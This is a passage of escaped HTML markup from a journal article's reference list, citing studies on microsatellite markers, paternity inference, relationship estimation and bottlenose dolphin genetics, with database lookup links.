href=\u0022{openurl}?query=rft.jtitle%253DMol.%2BEcol.%2BResour.%26rft.volume%253D10%26rft.spage%253D551%26rft_id%253Dinfo%253Adoi%252F10.1111%252Fj.1755-0998.2009.02787.x%26rft_id%253Dinfo%253Apmid%252F21565056%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1111\/j.1755-0998.2009.02787.x\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=21565056\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=000276407300017\u0026amp;link_type=ISI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-newisilink cit-ref-sprinkles-webofscience\u0022\u003E\u003Cspan\u003EWeb of Science\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-23-2\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-23\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.23\u0022 data-doi=\u002210.1038\/sj.hdy.6800009\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EKalinowski\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ES. T.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2002\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EHow many alleles per locus should be used to estimate genetic distances?\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EHeredity\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E88\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E62\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E65\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DHeredity%26rft.stitle%253DHeredity%26rft.aulast%253DKalinowski%26rft.auinit1%253DS.%2BT.%26rft.volume%253D88%26rft.issue%253D1%26rft.spage%253D62%26rft.epage%253D65%26rft.atitle%253DHow%2Bmany%2Balleles%2Bper%2Blocus%2Bshould%2Bbe%2Bused%2Bto%2Bestimate%2Bgenetic%2Bdistances%253F%26rft_id%253Dinfo%253Adoi%252F10.1038%252Fsj.hdy.6800009%26rft_id%253Dinfo%253Apmid%252F11813108%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1038\/sj.hdy.6800009\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=11813108\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=000176214400011\u0026amp;link_type=ISI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-newisilink cit-ref-sprinkles-webofscience\u0022\u003E\u003Cspan\u003EWeb of Science\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-24-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-24\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.24\u0022 data-doi=\u002210.1111\/j.1365-294X.2007.03089.x\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EKalinowski\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ES. T.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ETaper\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EM. L.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EMarshall\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ET. C.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2007\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003ERevising how the computer program CERVUS accommodates genotyping error increases success in paternity assignment.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EMol. Ecol.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E16\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E1099\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E1106\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DMolecular%2BEcology%2B%2528Print%2529%26rft.stitle%253DMolecular%2BEcology%2B%2528Print%2529%26rft.aulast%253DKalinowski%26rft.auinit1%253DS.%2BT.%26rft.volume%253D16%26rft.issue%253D5%26rft.spage%253D1099%26rft.epage%253D1106%26rft.atitle%253DRevising%2Bhow%2Bthe%2Bcomputer%2Bprogram%2BCERVUS%2Baccommodates%2Bgenotyping%2Berror%2Bincreases%2Bsuccess%2Bin%2Bpaternity%2Bassignment.%26rft_id%253Dinfo%253Adoi%252F10.1111%252Fj.1365-294X.2007.03089.x%26rft_id%253Dinfo%253Apmid%252F17305863%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1111\/j.1365-294X.2007.03089.x\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=17305863\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=000244245300014\u0026amp;link_type=ISI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-newisilink cit-ref-sprinkles-webofscience\u0022\u003E\u003Cspan\u003EWeb of Science\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-25-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-25\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.25\u0022 data-doi=\u002210.1016\/j.anbehav.2012.08.029\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EKopps\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EA. M.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ESherwin\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EW. B.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2012\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EModelling the emergence and stability of a vertically transmitted cultural trait in bottlenose dolphins.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EAnim. Behav.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E84\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E1347\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E1362\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DAnim.%2BBehav.%26rft.volume%253D84%26rft.spage%253D1347%26rft_id%253Dinfo%253Adoi%252F10.1016%252Fj.anbehav.2012.08.029%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1016\/j.anbehav.2012.08.029\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=000311953200009\u0026amp;link_type=ISI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-newisilink cit-ref-sprinkles-webofscience\u0022\u003E\u003Cspan\u003EWeb of Science\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-26-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-26\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.26\u0022 data-doi=\u002210.1007\/s12686-012-9727-1\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EKopps\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EA.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EMcDonald\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EP.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ERollins\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EL.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2013\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EIsolation and characterisation of polymorphic microsatellite loci for Noisy Miners \u003Cem\u003EManorina melanocephala\u003C\/em\u003E, with successful cross-amplification in Bell Miners \u003Cem\u003EM. melanophrys\u003C\/em\u003E.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EConserv. Genet. Resour.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E5\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E39\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E41\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DConserv.%2BGenet.%2BResour.%26rft.volume%253D5%26rft.spage%253D39%26rft_id%253Dinfo%253Adoi%252F10.1007%252Fs12686-012-9727-1%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1007\/s12686-012-9727-1\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-27-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-27\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.27\u0022 data-doi=\u002210.1098\/rspb.2013.3245\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EKopps\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EA. M.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EAckermann\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EC. Y.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ESherwin\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EW. B.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EAllen\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ES. J.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EBejder\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EL.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-etal\u0022\u003Eet al.\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2014\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003ECultural transmission of tool use combined with habitat specialisations leads to fine-scale genetic structure in bottlenose dolphins\u003C\/span\u003E. \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EProc. Biol. Sci.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E281\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E20133245\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DProc.%2BBiol.%2BSci.%26rft_id%253Dinfo%253Adoi%252F10.1098%252Frspb.2013.3245%26rft_id%253Dinfo%253Apmid%252F24648223%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/ijlink\/YTozOntzOjQ6InBhdGgiO3M6MTQ6Ii9sb29rdXAvaWpsaW5rIjtzOjU6InF1ZXJ5IjthOjQ6e3M6ODoibGlua1R5cGUiO3M6NDoiQUJTVCI7czoxMToiam91cm5hbENvZGUiO3M6Nzoicm95cHJzYiI7czo1OiJyZXNpZCI7czoxNzoiMjgxLzE3ODIvMjAxMzMyNDUiO3M6NDoiYXRvbSI7czoxODoiL2dnZy81LzkvMTgxNS5hdG9tIjt9czo4OiJmcmFnbWVudCI7czowOiIiO30=\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-ijlink\u0022\u003E\u003Cspan\u003E\u003Cspan class=\u0022cit-reflinks-abstract\u0022\u003EAbstract\u003C\/span\u003E\u003Cspan class=\u0022cit-sep cit-reflinks-variant-name-sep\u0022\u003E\/\u003C\/span\u003E\u003Cspan class=\u0022cit-reflinks-full-text\u0022\u003E\u003Cspan class=\u0022free-full-text\u0022\u003EFREE \u003C\/span\u003EFull Text\u003C\/span\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-28-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-28\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.28\u0022 data-doi=\u002210.1371\/journal.pgen.1004144\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ELi\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EH.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EGlusman\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EG.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EHu\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EH.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EShankaracharya\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EJ.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ECaballero\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-etal\u0022\u003Eet al.\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2014\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003ERelationship estimation from whole-genome sequence data.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EPLoS Genet.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E10\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003Ee1004144\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DPLoS%2BGenet.%26rft.volume%253D10%26rft.spage%253De1004144%26rft_id%253Dinfo%253Adoi%252F10.1371%252Fjournal.pgen.1004144%26rft_id%253Dinfo%253Apmid%252F24497848%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1371\/journal.pgen.1004144\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=24497848\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-29-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-29\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.29\u0022 data-doi=\u002210.1046\/j.1365-294x.1998.00374.x\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EMarshall\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ET. C.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ESlate\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EJ.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EKruuk\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EL. E. B.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EPemberton\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EJ. M.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E1998\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EStatistical confidence for likelihood-based paternity inference in natural populations.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EMol. Ecol.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E7\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E639\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E655\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DMolecular%2BEcology%2B%2528Print%2529%26rft.stitle%253DMolecular%2BEcology%2B%2528Print%2529%26rft.aulast%253DMarshall%26rft.auinit1%253DT.%2BC.%26rft.volume%253D7%26rft.issue%253D5%26rft.spage%253D639%26rft.epage%253D655%26rft.atitle%253DStatistical%2Bconfidence%2Bfor%2Blikelihood-based%2Bpaternity%2Binference%2Bin%2Bnatural%2Bpopulations.%26rft_id%253Dinfo%253Adoi%252F10.1046%252Fj.1365-294x.1998.00374.x%26rft_id%253Dinfo%253Apmid%252F9633105%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1046\/j.1365-294x.1998.00374.x\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=9633105\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=000073810200009\u0026amp;link_type=ISI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-newisilink cit-ref-sprinkles-webofscience\u0022\u003E\u003Cspan\u003EWeb of Science\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-30-1\u0022 title=\u0022View reference in text\u0022 